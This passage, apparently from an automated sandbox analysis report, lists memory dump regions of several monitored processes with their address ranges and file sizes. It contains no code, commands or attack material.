                                                                                                                                                                              372KB

                                                                                                                                                                            • memory/4192-194-0x00000000048A1000-0x00000000049A2000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              1.0MB

                                                                                                                                                                            • memory/4192-178-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4200-431-0x0000019360EE0000-0x0000019360FAF000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              828KB

                                                                                                                                                                            • memory/4200-381-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4200-430-0x0000019360E70000-0x0000019360EDE000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              440KB

                                                                                                                                                                            • memory/4224-258-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4248-289-0x00000000005A0000-0x00000000005A1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4248-316-0x0000000000D00000-0x0000000000D01000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4248-298-0x0000000000CC0000-0x0000000000CC1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4248-313-0x000000001B270000-0x000000001B272000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              8KB

                                                                                                                                                                            • memory/4248-280-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4248-310-0x0000000000CD0000-0x0000000000CF3000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              140KB

                                                                                                                                                                            • memory/4260-286-0x0000027BDB1E0000-0x0000027BDB22E000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              312KB

                                                                                                                                                                            • memory/4260-419-0x0000027BDCDB0000-0x0000027BDCDCB000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              108KB

                                                                                                                                                                            • memory/4260-420-0x0000027BDDC00000-0x0000027BDDD06000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              1.0MB

                                                                                                                                                                            • memory/4260-299-0x0000027BDB500000-0x0000027BDB574000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              464KB

                                                                                                                                                                            • memory/4260-279-0x00007FF7038B4060-mapping.dmp
                                                                                                                                                                            • memory/4280-184-0x00007FF7038B4060-mapping.dmp
                                                                                                                                                                            • memory/4280-203-0x0000015A68900000-0x0000015A68971000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              452KB

                                                                                                                                                                            • memory/4284-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4288-366-0x0000000005250000-0x0000000005251000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4288-282-0x00000000051D0000-0x00000000051D1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4288-245-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4288-271-0x00000000009E0000-0x00000000009E1000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4308-256-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4352-425-0x0000000002D80000-0x0000000002D82000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              8KB

                                                                                                                                                                            • memory/4352-322-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4352-324-0x0000000000520000-0x0000000000521000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4372-347-0x0000000000418836-mapping.dmp
                                                                                                                                                                            • memory/4372-346-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              120KB

                                                                                                                                                                            • memory/4372-357-0x0000000005320000-0x0000000005926000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              6.0MB

                                                                                                                                                                            • memory/4452-362-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              36KB

                                                                                                                                                                            • memory/4452-363-0x0000000000402E1A-mapping.dmp
                                                                                                                                                                            • memory/4468-249-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4468-360-0x00000000001C0000-0x00000000001CA000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              40KB

                                                                                                                                                                            • memory/4532-278-0x000002039B780000-0x000002039B781000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4532-260-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4540-323-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4540-402-0x0000000002DD0000-0x00000000036F6000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              9.1MB

                                                                                                                                                                            • memory/4540-401-0x0000000000400000-0x0000000000D41000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              9.3MB

                                                                                                                                                                            • memory/4624-253-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4688-257-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4700-400-0x00000000054B0000-0x00000000059AE000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              5.0MB

                                                                                                                                                                            • memory/4700-390-0x000000000041888A-mapping.dmp
                                                                                                                                                                            • memory/4768-292-0x0000000000370000-0x0000000000371000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4768-315-0x0000000004D90000-0x0000000004D91000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/4768-267-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4796-330-0x000000000041884E-mapping.dmp
                                                                                                                                                                            • memory/4796-327-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              120KB

                                                                                                                                                                            • memory/4796-345-0x0000000004E30000-0x0000000005436000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              6.0MB

                                                                                                                                                                            • memory/4904-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/4920-326-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              120KB

                                                                                                                                                                            • memory/4920-329-0x000000000041884A-mapping.dmp
                                                                                                                                                                            • memory/4920-344-0x00000000028E0000-0x00000000028F2000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              72KB

                                                                                                                                                                            • memory/5080-367-0x00000000004E0000-0x000000000062A000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              1.3MB

                                                                                                                                                                            • memory/5080-368-0x0000000000400000-0x00000000004D7000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              860KB

                                                                                                                                                                            • memory/5080-375-0x0000000002533000-0x0000000002534000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/5080-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/5080-374-0x0000000002532000-0x0000000002533000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/5080-370-0x0000000002530000-0x0000000002531000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              4KB

                                                                                                                                                                            • memory/5080-386-0x0000000002534000-0x0000000002536000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              8KB

                                                                                                                                                                            • memory/5092-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/5092-359-0x0000000000400000-0x00000000004DE000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              888KB

                                                                                                                                                                            • memory/5092-358-0x00000000004E0000-0x000000000062A000-memory.dmp
                                                                                                                                                                              Filesize

                                                                                                                                                                              1.3MB

                                                                                                                                                                            • memory/5104-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/5116-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/5152-432-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/5164-406-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/5240-434-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/5612-421-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/5820-424-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/5912-428-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/6020-429-0x0000000000000000-mapping.dmp
                                                                                                                                                                            • memory/6140-433-0x0000000000000000-mapping.dmp